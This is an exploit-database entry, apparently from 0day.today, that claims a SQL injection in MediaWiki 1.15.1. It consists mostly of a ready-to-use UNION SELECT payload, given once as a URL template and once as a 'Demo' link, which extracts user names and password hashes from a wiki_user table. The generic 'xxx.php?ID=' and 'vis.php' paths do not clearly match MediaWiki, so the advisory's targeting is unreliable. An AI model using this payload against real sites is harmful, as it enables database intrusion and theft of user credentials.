id: 10615
date: 01/06/2010
title: MediaWiki 1.15.1 SQL Injection Vulnerability
author: Gamoscu
cves: 

============================================
MediaWiki 1.15.1 SQL Injection Vulnerability
============================================

#############################################################
# MediaWiki 1.15.1 SQL Injection Vulnerability
 
# Plugin Home: http://www.mediawiki.org/wiki/MediaWiki

##############################################################
 
 
# Download   Script                 : http://www.mediawiki.org/wiki/MediaWiki
                                    : http://www.mediawiki.org/wiki/Download
 
  
# Exploit: xxxxx.com/xxx/xxx.php?ID=[SQL-inj]
 
 
#    -1/**/union/**/all/**/select/**/1,user_password,3,user_name,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29+from+wiki_user--
     
            
          
 
# Demo: http://site.com/vis.php?ID=-1/**/union/**/all/**/select/**/1,user_password,3,user_name,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29+from+wiki_user--



#  0day.today [2023-03-22]  #